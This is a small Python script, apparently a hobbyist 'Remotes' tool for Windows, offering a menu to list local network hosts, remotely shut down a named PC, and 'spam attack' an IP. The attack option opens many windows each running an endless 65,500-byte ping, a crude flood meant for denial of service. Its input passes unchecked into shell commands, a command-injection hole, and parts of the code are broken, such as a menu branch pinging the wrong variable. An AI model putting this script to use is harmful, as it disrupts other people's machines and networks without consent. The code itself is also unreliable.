import os, time from colorama import Fore, init title = """ ____ __ / __ \___ ____ ___ ____ / /____ _____ / /_/ / _ \/ __ `__ \/ __ \/ __/ _ \/ ___/ / _, _/ __/ / / / / / /_/ / /_/ __(__ ) /_/ |_|\___/_/ /_/ /_/\____/\__/\___/____/ """ init() def any(): while True: os.system("cls") print(Fore.RED + title) print(Fore.RED + "Type 1 To see your network connections") print(Fore.RED + "Type 2 To ping and learn pc name in your network") print(Fore.RED + "Type 3 To shutdown that pc") print(Fore.RED + "Type 4 To spam attack a ip") i = input("") if i == "1": os.system("arp -a") aaa = input(Fore.RED + Fore.YELLOW + "Enter ip to ping: ") os.system("cls") os.system("ping -a " + aaa) os.system("cls") elif i == "2": aa = input(Fore.RED + Fore.YELLOW + "Enter ip adress: ") os.system("cls") os.system("ping -a " + aaa) os.system("cls") elif i == "3": aaaa = input(Fore.RED + Fore.YELLOW + "Enter pc name to to shutdown: ") os.system("shutdown -m -e \\" + aaaa) os.system("cls") print(Fore.RED + Fore.YELLOW + "That pc should be closed now.") time.sleep(3) os.system("cls") elif i == "4": ddos = input("Type Ip: ") tabs = int(input("How many tabs(1 tab = 0.6 mb): ")) print("Started.") time.sleep(2) os.system("cls") for _ in range(tabs): os.system(f'start cmd /k ping -t -l 65500 {ddos}') else: print("Select a option") os.system("cls") any()